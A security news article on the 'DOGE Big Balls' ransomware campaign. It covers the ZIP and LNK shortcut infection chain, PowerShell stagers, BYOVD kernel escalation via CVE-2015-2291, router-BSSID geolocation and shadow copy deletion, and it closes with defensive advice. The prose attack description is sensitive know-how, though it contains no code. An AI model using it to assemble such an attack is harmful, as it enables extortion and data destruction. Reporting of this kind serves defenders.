Cyber Security News

DOGE ‘Big Balls’ Ransomware Utilizes ZIP-Based LNK Shortcuts and BYOVD Techniques for Stealthy Attacks

A new and highly sophisticated ransomware campaign, dubbed “DOGE BIG BALLS Ransomware,” has recently come to light, demonstrating a blend of technical innovation and psychological manipulation.

This operation stands out for its multi-stage infection chain, which begins with a seemingly innocuous ZIP file and culminates in the deployment of a customized ransomware payload, all while leveraging advanced evasion techniques.

Infection Chain: ZIP Files and LNK Shortcuts

The attack typically starts with a ZIP file, often themed around financial matters such as “Pay Adjustment.zip.” Inside, a deceptive LNK (shortcut) file masquerades as a PDF or other legitimate document.

When the victim opens this shortcut, it silently executes a series of PowerShell commands.

These commands download and run a script that checks for administrative privileges and, depending on the user’s access level, downloads additional malicious files.

If administrative rights are detected, the script creates a hidden folder in the system’s startup directory and downloads a modified version of the Fog ransomware disguised as “Adobe Acrobat.exe.”

It also retrieves a kernel exploit tool, “ktool.exe,” which is crucial for the next phase of the attack.

For non-admin users, the ransomware is placed in a user-specific startup folder, likely to be triggered later.

The PowerShell scripts used in this campaign are notable for their anti-analysis features and psychological tactics.

They include provocative statements and references to real individuals, likely intended to confuse or intimidate victims and analysts.

BYOVD: Exploiting Vulnerable Drivers

A standout feature of this campaign is its use of the Bring Your Own Vulnerable Driver (BYOVD) technique.

The attackers exploit a known vulnerability in an Intel driver (CVE-2015-2291) to gain kernel-level access.

This allows them to escalate privileges, disable security logging, and ensure the ransomware can operate undetected.

The kernel exploit tool is executed with a process ID and a hardcoded key, acting as an execution guardrail to prevent unauthorized use.

Before encrypting files, the ransomware collects extensive system and network information, including hardware IDs, network configurations, and running processes.

Uniquely, it queries the Wigle.net API using the MAC address of the victim’s router (BSSID) to determine the physical location of the device.

This method provides far more accurate geolocation than traditional IP-based techniques, indicating a highly targeted approach.

Ransomware Execution and Psychological Manipulation

Once executed, the ransomware displays a confirmation prompt, opens a ransom note, and logs its activities.

The ransom note references a real individual, Edward Coristine, and demands payment in Monero cryptocurrency.

The branding and references appear designed to mislead, intimidate, or malign specific individuals or organizations.

After encrypting files with the “.flocked” extension, the ransomware drops ransom notes in every affected folder and deletes shadow volume copies to prevent recovery.

The attack also embeds a Havoc C2 beacon, suggesting the potential for long-term access or further post-encryption activities.

Anti-analysis techniques, such as environment variable checks, are used to evade detection in sandboxed or monitored environments.

To defend against such advanced threats, organizations should:

  • Block execution of untrusted LNK files and PowerShell scripts.
  • Monitor PowerShell activity and process chains for anomalies.
  • Deploy Endpoint Detection and Response (EDR) solutions.
  • Limit administrative privileges and monitor for privilege escalation.
  • Restrict outbound traffic to unauthorized cloud services and monitor for suspicious API calls.

The DOGE BIG BALLS ransomware campaign exemplifies the evolving sophistication of cyber threats, combining technical innovation with psychological tactics to maximize impact and evade detection.

Robust, layered security measures are essential to defend against such multi-faceted attacks.

Find this News Interesting! Follow us on Google NewsLinkedIn, & X to Get Instant Updates!

Kaaviya

Kaaviya is a Security Editor and fellow reporter with Cyber Security News. She is covering various cyber security incidents happening in the Cyber Space.

Recent Posts

Hackers Exploit Windows Remote Management to Evade Detection in AD Networks

A new wave of cyberattacks is targeting Active Directory (AD) environments by abusing Windows Remote…

11 minutes ago

Researchers Uncover Remote Code Execution Flaw in macOS – CVE-2024-44236

Security researchers Nikolai Skliarenko and Yazhi Wang of Trend Micro’s Research Team have disclosed critical…

45 minutes ago

Apache ActiveMQ Vulnerability Allows Attackers to Induce DoS Condition

Critical vulnerability in Apache ActiveMQ (CVE-2024-XXXX) exposes brokers to denial-of-service (DoS) attacks by allowing malicious…

48 minutes ago

Kaspersky Alerts on AI-Driven Slopsquatting as Emerging Supply Chain Threat

Cybersecurity researchers at Kaspersky have identified a new supply chain vulnerability emerging from the widespread…

49 minutes ago

UK Government to Shift Away from Passwords in New Security Move

UK government has unveiled plans to implement passkey technology across its digital services later this…

51 minutes ago

Europol Dismantles DDoS-for-Hire Network and Arrests Four Administrators

Significant blow to cybercriminal infrastructure, Europol has coordinated an international operation resulting in the arrest…

59 minutes ago